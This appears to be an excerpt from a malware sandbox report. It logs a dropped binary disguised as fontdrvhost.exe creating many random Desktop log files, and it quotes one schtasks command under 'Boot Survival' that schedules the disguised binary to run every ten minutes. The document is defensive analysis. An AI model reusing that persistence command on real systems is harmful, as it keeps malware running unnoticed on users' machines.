Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WvXEaKPX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MMDorhKp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CdkYHFFH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\mbeUnBPt.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\cnAeDqUL.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zntiAIEO.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XsyMwKeS.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xHZssejW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fvxnZIOH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TCIWpNeY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DACRVJoK.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uRiBlhjd.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RRcFiATg.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\yEAAOeyR.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\oQWKeSDj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YOQFKOOU.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OgxpbmIn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uJzjHyIX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\PEqxAxdY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\FWXhQVXq.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\wsOrhbIJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\nJvbxzCb.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\dabMNWxu.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MTLhtkSf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CkrRJHNx.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ldamqVhj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ZklVGaxA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IdUqmnRm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\inkviYhq.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XzFFzMmI.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\GspafaHt.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\maCuLVwe.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\UOaorzbP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JavyIngh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\BxnIYuRz.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ifAdEpGk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zldaSYtH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hRSCUTxn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YnJNkaiG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xOrrZDRn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\SdGfOIqy.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JAxqeOaQ.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zReaumVj.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\qiKKKJQB.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\iKNvbzqU.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ZbufrXkm.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\GPSaXBQY.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xgyKnYKq.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\msUTDNPI.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MHvzAhUM.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CTQIQVae.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kMzdwiuP.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aYVnMXzh.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\QpCXcuuA.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\GGiHtSpS.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ouGCZwUD.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fLnmpTPV.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OEWHVhjH.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DQsQlVoZ.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\mJblSiJK.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WAZwZzli.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aFyNQRuY.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\SbqYhYfr.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IsWIxvZJ.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\qguCdZEu.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YUSxJEkf.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\NgoGZspx.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TYRgCYum.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sihlzJJp.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\iANVPgEI.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YMjefUJa.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WgOpYqoh.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KnZYovDz.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\lCADkPID.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\QfCxRbIn.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rudcNvNr.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WYfWtHNc.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ELDRalsN.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rmtKjMmm.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\iJlVzTXF.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YVGePHcW.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\HlvZPcYC.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\bAJNFhyM.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TWBYVoif.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RMfXVWDe.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\AFOsBjYP.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zzDSBAiP.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hsmnhNDB.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XEIwxBIS.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\wOXBumXW.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\eCwwaQCH.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TORFqFIZ.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JfyqGcCs.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sYhLnqXd.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ikDUDecv.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YBjETBXN.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\HuSZzPsz.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\piqUgtXk.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fzXEwQRC.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ULtOMFWU.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DEcjsSrF.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sQxsIGwX.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aABfDneW.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ipFMCTyG.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RnzHiPIs.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\pntLeisv.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\VWGgLdif.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\EOpBrqDR.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\mCNvXUiC.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TlbPEPXm.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zTojkKNX.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ZtZwWUdP.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OemrfNDp.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\FvSbvlyH.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uHokLZDZ.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\LovAYRCw.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zuGjoWSN.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\inpEUjnz.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XzKOkXsR.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\HxFJRUCD.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\qiEMTywj.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fuaVjmBB.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OnJqPAWm.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JvAHRkKP.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\COTaDrJc.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\lHCvjEeO.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\bYjfzcZg.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\QkEpPQey.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IHwzgXOR.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rAfUMkjC.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OzZYIDTF.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\EQFIYaOX.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\nJodFojJ.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\dbVNVLdb.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\AaPSReOe.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rrvChBIx.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hJcmyZDP.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\PwAgeDiA.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xkYbKhNl.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WuogHSdp.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MLVQXpXH.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DdBAnNSZ.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uztLDTCs.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kQZvTrxL.log

Boot Survival

Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Process information set: NOOPENFILEERRORBOX
